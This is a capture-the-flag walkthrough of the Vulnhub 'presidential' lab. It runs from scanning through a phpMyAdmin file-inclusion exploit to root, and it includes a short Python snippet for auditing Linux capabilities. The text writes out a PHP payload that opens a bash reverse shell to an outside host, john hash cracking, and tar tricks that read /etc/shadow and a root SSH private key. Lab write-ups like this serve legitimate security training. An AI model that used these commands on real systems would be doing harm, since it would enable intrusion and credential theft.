Vulnhub's presidential
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Catalog
I. Host discovery with nmap
II. Port scanning
III. Service version discovery
IV. Information gathering
V. Directory scanning
VI. Subdomain brute forcing
VII. phpMyAdmin
VIII. Reverse shell
IX. Cracking the hash with john
X. Capabilities
XI. Privilege escalation with tars
I. Host discovery with nmap
Run a ping-based scan; the other scan types are a bit slow.

II. Port scanning

III. Service version discovery

IV. Information gathering
1. Home page
The other functions and the page source are not of much use to us.

V. Directory scanning
Check the results one by one: no response. A domain name was collected above, so bind that domain name and try again.

1. Bind the domain name
2. /config.php.bak
This one holds 107 B of data. In its source we find the database name, account and password.

VI. Subdomain brute forcing
One subdomain is found, database.votenow.local. Bind it to the IP and visit it.

We find a phpMyAdmin login page; with the account and password found earlier, log in to phpMyAdmin.

VII. phpMyAdmin
1. Check the version
2. Vulnerability search
There are three vulnerabilities; we use the file inclusion vulnerability described in 44928.txt.

3. Contents of the file
First write a file through the database, then use the file inclusion to execute that file.
4. Try it
Note: change sessions to session, otherwise it will not work.
Put the domain name in front, followed by the session, and it works.

VIII. Reverse shell
Log out and log in again to get a new session; the remaining steps are the same as above.
select '<?php system('bash -i >& /dev/tcp/192.168.0.107/8888 0>&1');exit;?>'

IX. Cracking the hash with john
In phpMyAdmin we also found a user name and hash value:
admin $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i
Try cracking it:
john hash --wordlist=rockyou.txt
Stella

su admin
and get a shell back with python.

X. Capabilities
1. Check which binaries carry capability privileges
getcap -r / 2>/dev/null
2. Meaning:
Permitted
This set defines the upper limit of the privileges a thread can have; it is a superset of the Inheritable and Effective sets.
Effective
The set the kernel actually checks when it checks a privileged operation (capabilities can be added to or removed from the Effective set to temporarily enable or disable a privilege).
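An added example, not part of the original post, that decodes the Permitted and Effective sets described above from a constructed /proc/<pid>/status excerpt and checks the kernel-enforced rule that Effective stays within Permitted. The sample status lines, the partial CAP_NAMES table and the HIGH_RISK list are assumptions of this example.

```python
import re

# Subset of the capability numbering from capabilities(7); bits not listed
# here are reported as cap_<n> rather than guessed.
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
    3: "cap_fowner", 5: "cap_kill", 6: "cap_setgid", 7: "cap_setuid",
    8: "cap_setpcap", 12: "cap_net_admin", 13: "cap_net_raw",
    19: "cap_sys_ptrace", 21: "cap_sys_admin", 27: "cap_mknod",
}
# Capabilities an auditor wants flagged when a non-root process holds them,
# since each lets the holder bypass file or process boundaries (assumption).
HIGH_RISK = {"cap_dac_override", "cap_dac_read_search", "cap_setuid",
             "cap_sys_admin", "cap_sys_ptrace"}

def decode_mask(hexmask):
    """Turn the 64-bit hex mask of a CapXxx: line into a set of names."""
    mask = int(hexmask, 16)
    return {CAP_NAMES.get(b, f"cap_{b}") for b in range(64) if mask >> b & 1}

def parse_status(text):
    """Extract CapInh/CapPrm/CapEff/CapBnd from a /proc/<pid>/status dump."""
    sets = {}
    for line in text.splitlines():
        m = re.match(r"(CapInh|CapPrm|CapEff|CapBnd):\s*([0-9a-fA-F]{16})$", line.strip())
        if m:
            sets[m.group(1)] = decode_mask(m.group(2))
    return sets

def audit(sets):
    """Return findings: a violation of Effective <= Permitted (the kernel
    rejects such a state) and any high-risk capability that is Effective."""
    findings = []
    stray = sets.get("CapEff", set()) - sets.get("CapPrm", set())
    if stray:
        findings.append(f"Effective not within Permitted: {sorted(stray)}")
    for cap in sorted(sets.get("CapEff", set()) & HIGH_RISK):
        findings.append(f"high-risk capability effective: {cap}")
    return findings

# Constructed excerpt: a non-root process whose only capability is bit 2
# (cap_dac_read_search), which lets it read any file regardless of mode bits.
SAMPLE_STATUS = """\
Name:\tbackup-helper
Uid:\t1000\t1000\t1000\t1000
CapInh:\t0000000000000000
CapPrm:\t0000000000000004
CapEff:\t0000000000000004
CapBnd:\t0000003fffffffff
"""

if __name__ == "__main__":
    for finding in audit(parse_status(SAMPLE_STATUS)):
        print(finding)
```

On a live host, feed it the contents of /proc/<pid>/status for the process in question; the same bit numbering applies to the masks that getcap prints in its "=" form.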

3. Check them one by one
Look for commands that our admin user can run; tars is one we can execute.

XI. Privilege escalation with tars
1. Read /etc/shadow
Read it by archiving:
tar -cf archive.tar /etc/shadow
Extract it:
tar -xf archive.tar
Take the root hash from inside and try a dictionary against it. With the right dictionary it should be crackable.

2. Read the private key file
As above, use tars to read the file, then extract it. Put it under admin's .ssh directory, then log in via ssh; privilege escalation succeeds.
ssh -i id_rsa [email protected] -p 2082

Get flag
